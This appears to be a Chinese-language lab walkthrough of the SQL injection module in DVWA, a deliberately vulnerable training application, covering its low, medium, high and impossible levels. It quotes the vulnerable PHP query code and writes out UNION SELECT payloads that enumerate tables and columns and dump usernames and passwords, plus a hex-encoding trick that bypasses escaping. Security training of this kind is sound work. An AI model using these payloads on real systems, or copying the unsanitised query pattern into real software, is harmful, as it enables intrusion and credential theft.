一、SQL注入介绍

1.1、通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。通过SQL注入可以对程序对应的数据存储区进行对应的探测。
1.2、形成SQL注入漏洞的原因：

  1、用户输入不可控
  2、输入内容被带入SQL语句执行

1.3、手工注入常规思路：

  1、判断是否存在注入，注入是字符型还是数字型
  2、猜解SQL查询语句中的字段数
  3、确定回显位置
  4、获取当前数据库，获取数据库中的表，获取字段名
  5、得到数据

二、SQL注入（low）

2.1、分析源码，可以看到没有对参数做任何的过滤，直接带入数据库进行查询，分析查询语句可能存在字符型注入，也可以分别输入1+2，和3，判断是否是数字型。

<?php

if( isset( $_REQUEST[ ‘Submit‘ ] ) ) { //判断Submit变量是否存在
    // Get input
    $id = $_REQUEST[ ‘id‘ ]; //没有对参数进行过滤

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘;";//带‘‘表示为字符型，不带表示数字型
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( ‘<pre>‘ . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ‘</pre>‘ );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

  mysql_query()函数，如果是执行查询之类的语句（select），那么会返回一个资源标识符，也就是我们要查找的数据结果集；如果是执行增删改之类的语句，返回的就是true或者false了。

2.2、测试sql是否存在注入以及注入的类型，这里可以用1‘and‘1‘=‘1

2.3、猜解sql查询语句中的字段数，1‘ order by 2#有结果，1‘ order by 3#错误，得到表的字段数是2


2.4、构建联合查询，确定回显位置1‘ union select 1,2#可以看出有两个回显

2.5、查询当前的数据库以及版本1‘ union select version(),database()#

2.6、获取数据库中的表 1‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

2.7、获取表中的字段名1‘ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users‘#

2.8、获取字段中的数据1‘ union select user,password from users#

字符型注入最关键的其实就是如何闭合SQL语句以及注释多余的代码，比如说

  ‘or 1=1 or‘   user_id=‘‘or 1=1 or‘‘   假or真or假
  1‘or‘1‘=‘1    user_id=‘1‘or‘1‘=‘1‘    真or真
  ‘or 1=1 #     user_id=‘‘or 1=1 #‘     假or真
  ‘or 1=1 --    user_id=‘‘or 1=1 --‘    假or真  

二、SQL注入（medium）

2.1、代码分析，中级然用户输入，只提供选择，分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中特殊字符如‘ ‘‘ / 空字符，查看sql查询语句可以看出可能存在数字型sql注入

2.2、存在注入并且注入类型为数字型

2.3、猜解字段数，得到字段个数为2


2.4、确定回显位置，下图说明有两个回显位置，1 union select 1,2#

2.5、获取当前数据库及版本1 union select database(),version()#

2.6、获取数据库中的所有表1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

2.7、获取表中的所有字段，由于单引号被转义，‘users‘无法执行，可以利用16进制进行绕过
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

2.8、获取字段中的数据1 union select user,password from users#

三、SQL注入（high）

代码分析，点击”here to change your ID”，页面自动跳转，防御了自动化的SQL注入，分析源码可以看到，对参数没有做防御，在sql查询语句中限制了查询条数

输入1‘ union select user,password from users#获得密码

三、SQL注入（impossible）

分析源码可以看出使用了PDO技术，杜绝了SQL注入。

  PDO就是PHP data Object，提供了PHP操作多种数据库的统一的接口

DVWA大通关（六、SQL注入）